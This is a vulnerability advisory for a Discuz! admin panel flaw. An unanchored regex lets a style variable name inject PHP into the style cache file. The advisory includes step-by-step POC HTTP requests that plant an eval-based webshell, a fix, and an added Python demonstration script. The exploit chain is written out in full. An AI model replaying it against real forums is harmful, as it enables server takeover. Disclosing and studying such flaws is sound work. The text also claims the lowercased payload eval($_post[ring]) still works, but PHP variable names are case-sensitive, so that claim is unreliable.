Discuz! admin\styles.inc.php get-webshell bug

author: ring04h
team: http://www.80vul.com

In Discuz!, the preg_match() check applied to the $newcvar variable in admin\styles.inc.php is not strict enough, which leads to a code execution vulnerability.

1. Analysis

The relevant code in admin\styles.inc.php:

    if($newcvar && $newcsubst) {
        if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
            cpmsg('styles_edit_variable_duplicate', '', 'error');
        // the pattern is not anchored: it only requires an identifier-like substring somewhere in $newcvar
        } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
            cpmsg('styles_edit_variable_illegal', '', 'error');
        }
        $newcvar = strtolower($newcvar);
        $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute) VALUES ('$id', '$newcvar', '$newcsubst')");
    }

The regular expression carries no anchors (^ at the start, $ or \z at the end), so preg_match() succeeds as soon as the variable name contains an identifier-like substring anywhere in it. A name such as !','80VUL');EVAL($_POST[RING]);// therefore passes the check on the strength of the substring "VUL" alone. The only other transformation before the INSERT is strtolower(), so whatever is submitted is stored entirely in lowercase (the POC below already sends the payload in lowercase).

As a result, anyone with admin panel access can edit a style and submit, in the custom template variable fields,

    variable:   !','80VUL');EVAL($_POST[RING]);//
    substitute: exp by ring04h!

The payload is shaped to break out of the quoted string and array literal in which the variable is written to the style cache file forumdata/cache/style_<id>.php: the leading !' closes the quoted name, ,'80VUL') closes the array, ;EVAL($_POST[RING]); becomes live PHP, and // comments out the rest of the generated line. Rebuilding the style cache thus writes a webshell to disk that executes code remotely.

2. Exploitation

POC. The formhash value is the per-session anti-CSRF token of the logged-in admin and must match that session. The Cookie header value (the admin session cookie) is not reproduced in the request dumps; the line after the blank line in each request is the POST body.

step 1: create a new style named "exp" (the body's GBK-encoded values are the existing default style's name and the "submit" button label):

POST /bbs/admincp.php?action=styles HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

formhash=99238f2d&anchor=&updatecsscache=0&namenew%5B1%5D=%C4%AC%C8%CF%B7%E7%B8%F1&availablenew%5B1%5D=1&defaultnew=1&newname=exp&stylesubmit=%CC%E1%BD%BB

step 2: edit the style created in step 1 (id=6 in this run) and add the custom variable. The newcvar value decodes to !','80vul');eval($_post[ring]);// and newcsubst to exp by ring04h!:

POST /bbs/admincp.php?action=styles&operation=edit&id=6 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1402
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB

webshell: http://www.80vul.com/bbs/forumdata/cache/style_6.php

3. Fix

The vulnerability has been reported to the vendor; an official patch is pending. Until then, the check should require the whole name to match by anchoring the pattern, e.g. /^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/D (the D modifier, or \z in place of $, stops a trailing newline from slipping past $), and the variable name should be escaped, not interpolated verbatim, when the style cache file is written.
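The following script is an added example; it is not part of the original advisory and not Discuz! code. It reproduces the unanchored check from the analysis above with Python's re module (re.search() has the same first-match-anywhere semantics as the original preg_match(); re.fullmatch() corresponds to an anchored /^...$/D pattern), URL-decodes the newcvar and newcsubst values from the step 2 request body, applies the strtolower() step, and renders the pair through render_cache_entry(), a deliberately simplified, hypothetical model of a 'variable' => 'substitute' array element written with the key unescaped. That model is an assumption made for illustration, not Discuz!'s real cache writer.

```python
import re
from urllib.parse import unquote_plus

# The pattern exactly as it appears in admin/styles.inc.php. PCRE and Python's
# re agree on it; \x7f-\xff covers the high bytes Discuz! permits in names.
STYLEVAR_PATTERN = r"[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*"


def vulnerable_check(name: str) -> bool:
    """Mirror of the original preg_match() call.

    No ^/$ anchors: the check passes as soon as *any* substring of the name
    looks like an identifier, which is what re.search() tests as well.
    """
    return re.search(STYLEVAR_PATTERN, name) is not None


def strict_check(name: str) -> bool:
    """The check as it should be: the whole name must match the pattern.

    re.fullmatch() is the Python equivalent of anchoring the PCRE pattern as
    /^...$/D (or \A...\z), so not even a trailing newline gets past it.
    """
    return re.fullmatch(STYLEVAR_PATTERN, name) is not None


def store_name(name: str) -> str:
    """Mirror of the strtolower() applied before the INSERT."""
    return name.lower()


def decode_form_value(value: str) -> str:
    """Decode one application/x-www-form-urlencoded value ('+' is a space)."""
    return unquote_plus(value)


def render_cache_entry(variable: str, substitute: str) -> str:
    """Hypothetical, simplified model (an assumption, not Discuz! code) of a
    style cache file emitting one PHP array element with the key unescaped.
    It exists only to show why the payload's leading !' and trailing // matter."""
    return f"  '{variable}' => '{substitute}',"


# Constructed from the step 2 request body quoted in the advisory.
POC_NEWCVAR = "%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F"
POC_NEWCSUBST = "exp+by+ring04h%21"


def analyse_poc() -> dict:
    """Run the POC values through each step and return what is observed."""
    name = decode_form_value(POC_NEWCVAR)
    subst = decode_form_value(POC_NEWCSUBST)
    stored = store_name(name)
    return {
        "decoded_name": name,
        "decoded_substitute": subst,
        "passes_vulnerable_check": vulnerable_check(name),
        "passes_strict_check": strict_check(name),
        "stored_name": stored,
        "cache_line": render_cache_entry(stored, subst),
    }


if __name__ == "__main__":
    for key, value in analyse_poc().items():
        print(f"{key}: {value}")
    # A legitimate name passes both checks; anything with surrounding junk,
    # including a bare trailing newline, only passes the unanchored one.
    for candidate in ("bgcolor", "bgcolor\n", "x'); phpinfo();//", "123"):
        print(repr(candidate), vulnerable_check(candidate), strict_check(candidate))
```

In the modelled cache line, `  '!','80vul');eval($_post[ring]);//' => 'exp by ring04h!',`, PHP reads `'!'` as a string, `,'80vul'` as a further array element, `)` as the end of the enclosing array(...), `;` as the end of that statement, then `eval($_post[ring]);` as a statement of its own, and `//` swallows the original `' => 'exp by ring04h!',` tail. The same decoded name fails strict_check() on its first character, which is the entire fix on the validation side.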